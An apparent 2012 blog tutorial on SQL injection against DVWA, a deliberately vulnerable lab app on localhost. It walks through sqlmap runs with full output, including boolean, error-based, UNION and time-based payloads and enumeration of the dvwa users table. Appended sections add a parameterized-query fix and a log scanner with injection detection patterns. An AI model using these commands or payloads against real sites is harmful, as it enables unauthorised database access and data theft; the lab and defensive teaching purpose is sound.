Wednesday, 01 February 2012

SQL INJECTION WITH DVWA


Start Apache and MySQL, then open DVWA by typing localhost/dvwa in the browser.
When the DVWA login page opens, enter your username and password.
Once logged in, open DVWA Security and set the security level to LOW.

 
Then open Tamper Data from the browser's Tools menu and start it by clicking Start Tamper.




Then enter the number 1 and click Submit. When the Tamper Data prompt appears for the request, click Tamper.

In the Tamper Data window you can see the Cookie header; copy its value, because it is passed to sqlmap in the shell commands below.


The commands and their output are shown below.

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=pag22l1idbstdes8f0e3avq8h1" --string="Surname" --dbs
    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 03:55:56

[03:55:56] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[03:55:56] [INFO] resuming injection data from session file
[03:55:56] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:55:56] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://localhost:80/dvwa/login.php'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] y
[03:55:58] [INFO] testing if the provided string is within the target URL page content
[03:55:58] [WARNING] you provided 'Surname' as the string to match, but such a string is not within the target URL page content original request, sqlmap will keep going anyway
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5750=5750 AND 'qBpA'='qBpA&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 6077 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,118,117,58),(SELECT (CASE WHEN (6077=6077) THEN 1 ELSE 0 END)),CHAR(58,117,119,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pPqT'='pPqT&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,116,118,117,58),IFNULL(CAST(CHAR(110,104,111,74,115,119,119,120,89,106) AS CHAR),CHAR(32)),CHAR(58,117,119,121,58))# AND 'qobI'='qobI&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'HWkj'='HWkj&Submit=Submit
---

[03:55:58] [INFO] manual usage of GET payloads requires url encoding
[03:55:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[03:55:58] [INFO] fetching database names
[03:55:58] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': information_schema, dvwa, fbip, mysql
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql

[03:55:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 03:55:58
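The first run above reports four injection techniques against the id parameter. The boolean-based one works because the low-security DVWA page splices the id value straight into the SQL text, so the attacker-chosen condition after the quote is evaluated by the database and its truth value shows up as a different page. The following is an added example, not code from the original post or from DVWA: it rebuilds that situation on a constructed in-memory SQLite table with the same column layout sqlmap later enumerates from dvwa.users, runs the boolean-based payload sqlmap reported against a string-spliced query and against a parameterized one, and shows that only the spliced query leaks the condition's truth value. The table contents, the FALSE variant of the payload (one digit changed) and the function names are assumptions for this example; the MySQL-specific error-based, UNION and SLEEP payloads are not exercised here because SQLite does not implement those functions.

```python
import sqlite3

# Constructed sample rows with the same column layout that sqlmap
# enumerates from dvwa.users later in the post (user_id, first_name,
# last_name, user, password, avatar). Names and hashes are placeholders.
SAMPLE_USERS = [
    (1, "Alice", "Example", "alice", "<hash-placeholder>", "/hackable/users/alice.jpg"),
    (2, "Bob", "Example", "bob", "<hash-placeholder>", "/hackable/users/bob.jpg"),
    (3, "Carol", "Example", "carol", "<hash-placeholder>", "/hackable/users/carol.jpg"),
]

# PAYLOAD_TRUE is the boolean-based payload sqlmap reported above;
# PAYLOAD_FALSE is constructed here by changing one digit so that the
# injected condition is false.
PAYLOAD_TRUE = "1' AND 5750=5750 AND 'qBpA'='qBpA"
PAYLOAD_FALSE = "1' AND 5750=5751 AND 'qBpA'='qBpA"


def make_db():
    """Build an in-memory SQLite table shaped like dvwa.users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT,"
        " user TEXT, password TEXT, avatar TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """The request value is pasted into the SQL text (the pattern the
    low-security DVWA page follows), so the text after the first quote
    is parsed as SQL rather than as part of the literal."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Hardened form: a bound parameter is compared as one opaque value,
    quotes and keywords included, so it can never change the query."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def boolean_oracle(lookup, conn):
    """True if the TRUE and FALSE payloads give different results, i.e.
    the lookup leaks the truth value of an attacker-chosen condition.
    This difference is exactly what boolean-based blind injection uses."""
    return lookup(conn, PAYLOAD_TRUE) != lookup(conn, PAYLOAD_FALSE)


if __name__ == "__main__":
    db = make_db()
    print("benign id=1, vulnerable   ->", lookup_vulnerable(db, "1"))
    print("benign id=1, safe         ->", lookup_safe(db, "1"))
    print("vulnerable, TRUE payload  ->", lookup_vulnerable(db, PAYLOAD_TRUE))
    print("vulnerable, FALSE payload ->", lookup_vulnerable(db, PAYLOAD_FALSE))
    print("safe, TRUE payload        ->", lookup_safe(db, PAYLOAD_TRUE))
    print("vulnerable leaks a bit:", boolean_oracle(lookup_vulnerable, db))
    print("safe leaks a bit:      ", boolean_oracle(lookup_safe, db))
```

With the spliced query the TRUE payload returns the same row as a plain id=1 and the FALSE payload returns nothing, which is the one-bit difference sqlmap turns into full data extraction. With the bound parameter both payloads return nothing, because the whole string is compared against user_id as a single value; in DVWA the same fix is to use a prepared statement instead of building the query string.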

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=pag22l1idbstdes8f0e3avq8h1" -D dvwa --tables
    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 03:56:44

[03:56:44] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[03:56:44] [INFO] resuming injection data from session file
[03:56:44] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:56:44] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://localhost:80/dvwa/login.php'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5750=5750 AND 'qBpA'='qBpA&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 6077 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,118,117,58),(SELECT (CASE WHEN (6077=6077) THEN 1 ELSE 0 END)),CHAR(58,117,119,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pPqT'='pPqT&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,116,118,117,58),IFNULL(CAST(CHAR(110,104,111,74,115,119,119,120,89,106) AS CHAR),CHAR(32)),CHAR(58,117,119,121,58))# AND 'qobI'='qobI&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'HWkj'='HWkj&Submit=Submit
---

[03:56:46] [INFO] manual usage of GET payloads requires url encoding
[03:56:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[03:56:46] [INFO] fetching tables for database: dvwa
[03:56:46] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[03:56:46] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 03:56:46

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=pag22l1idbstdes8f0e3avq8h1" -T users --columns
    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 03:57:44

[03:57:45] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[03:57:45] [INFO] resuming injection data from session file
[03:57:45] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:57:45] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://localhost:80/dvwa/login.php'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5750=5750 AND 'qBpA'='qBpA&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 6077 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,118,117,58),(SELECT (CASE WHEN (6077=6077) THEN 1 ELSE 0 END)),CHAR(58,117,119,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pPqT'='pPqT&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,116,118,117,58),IFNULL(CAST(CHAR(110,104,111,74,115,119,119,120,89,106) AS CHAR),CHAR(32)),CHAR(58,117,119,121,58))# AND 'qobI'='qobI&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'HWkj'='HWkj&Submit=Submit
---

[03:57:47] [INFO] manual usage of GET payloads requires url encoding
[03:57:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[03:57:47] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) columns
[03:57:47] [INFO] fetching current database
[03:57:47] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa
[03:57:47] [INFO] fetching columns for table 'users' on database 'dvwa'
[03:57:47] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': user_id, int(6), first_name, varchar(15), last_name, varchar(15), user, varchar(15), password, varchar(32), avatar, varchar(70)
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+

[03:57:47] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 03:57:47

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=pag22l1idbstdes8f0e3avq8h1" -T users -C user_id --dump

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 03:58:08

[03:58:08] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[03:58:08] [INFO] resuming injection data from session file
[03:58:08] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:58:08] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://localhost:80/dvwa/login.php'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5750=5750 AND 'qBpA'='qBpA&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 6077 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,118,117,58),(SELECT (CASE WHEN (6077=6077) THEN 1 ELSE 0 END)),CHAR(58,117,119,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pPqT'='pPqT&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,116,118,117,58),IFNULL(CAST(CHAR(110,104,111,74,115,119,119,120,89,106) AS CHAR),CHAR(32)),CHAR(58,117,119,121,58))# AND 'qobI'='qobI&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'HWkj'='HWkj&Submit=Submit
---

[03:58:10] [INFO] manual usage of GET payloads requires url encoding
[03:58:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[03:58:10] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[03:58:10] [INFO] fetching current database
[03:58:10] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[03:58:13] [INFO] fetching columns LIKE 'user_id' for table 'users' on database 'dvwa'
[03:58:13] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': user_id, int(6)
[03:58:13] [INFO] fetching column(s) 'user_id' entries for table 'users' on database 'dvwa'
[03:58:13] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': 1, 2, 3, 4, 5
Database: dvwa
Table: users
[5 entries]
+---------+
| user_id |
+---------+
| 1       |
| 3       |
| 2       |
| 5       |
| 4       |
+---------+

[03:58:13] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[03:58:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 03:58:13
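Every payload sqlmap used above travelled in the id query parameter of a GET request, so it also lands, URL-encoded, in the web server's access log. The following is an added example, not code from the original post: a small scanner that parses Apache combined-format lines, URL-decodes each query parameter and flags the four technique signatures reported above (quote followed by AND/OR, SLEEP/BENCHMARK calls, UNION SELECT, INFORMATION_SCHEMA or the FLOOR(RAND()) trick), plus the sqlmap User-Agent string. The log lines are constructed for this example from the payloads and timestamps in the post, the User-Agent is modelled on the sqlmap banner shown above, and the function names and labels are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format lines modelled on the run above: a
# benign request, then the boolean-based, time-based and UNION payloads
# sqlmap reported, percent-encoded as they appear in a GET request.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Feb/2012:03:55:56 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
127.0.0.1 - - [01/Feb/2012:03:55:57 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%205750%3D5750%20AND%20%27qBpA%27%3D%27qBpA&Submit=Submit HTTP/1.1" 200 4321 "-" "sqlmap/1.0-dev (r4009) (http://sqlmap.sourceforge.net)"
127.0.0.1 - - [01/Feb/2012:03:55:58 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%20SLEEP%285%29%20AND%20%27HWkj%27%3D%27HWkj&Submit=Submit HTTP/1.1" 200 4321 "-" "sqlmap/1.0-dev (r4009) (http://sqlmap.sourceforge.net)"
127.0.0.1 - - [01/Feb/2012:03:55:59 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C116%29%29%23&Submit=Submit HTTP/1.1" 200 4321 "-" "curl/7.19.7"
"""

# Apache "combined" log format: ip ident user [time] "method target proto"
# status size "referer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each pattern is checked against the URL-decoded value of every query
# parameter; the labels follow the technique names in sqlmap's output.
SIGNATURES = [
    ("boolean-based", re.compile(r"'\s*(AND|OR)\s", re.I)),
    ("time-based", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("union-based", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("error-based", re.compile(r"INFORMATION_SCHEMA|FLOOR\s*\(\s*RAND\s*\(", re.I)),
]


def scan_line(line):
    """Return a list of findings for one log line ([] if clean),
    or None if the line does not parse as a combined-format entry."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    findings = []
    # parse_qsl splits on & and = first, then percent-decodes, so an
    # encoded '=' or '#' inside a value cannot confuse the split.
    query = urlsplit(m.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        for label, pattern in SIGNATURES:
            if pattern.search(value):
                findings.append("%s in parameter '%s'" % (label, name))
    if "sqlmap" in m.group("ua").lower():
        findings.append("sqlmap user-agent")
    return findings


def scan_log(text):
    """Return (line_number, client_ip, findings) for every flagged line."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        findings = scan_line(line)
        if findings:
            ip = LOG_RE.match(line).group("ip")
            hits.append((number, ip, findings))
    return hits


if __name__ == "__main__":
    for number, ip, findings in scan_log(SAMPLE_LOG):
        print("line %d from %s: %s" % (number, ip, "; ".join(findings)))
```

Decoding before matching matters: the raw log line contains %27%20AND, not ' AND, so a signature applied to the undecoded request would miss every payload above. The User-Agent check is only a convenience, since sqlmap's agent string is trivially changed; the parameter signatures are what catch the fourth line, which carries a UNION payload under a curl agent.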
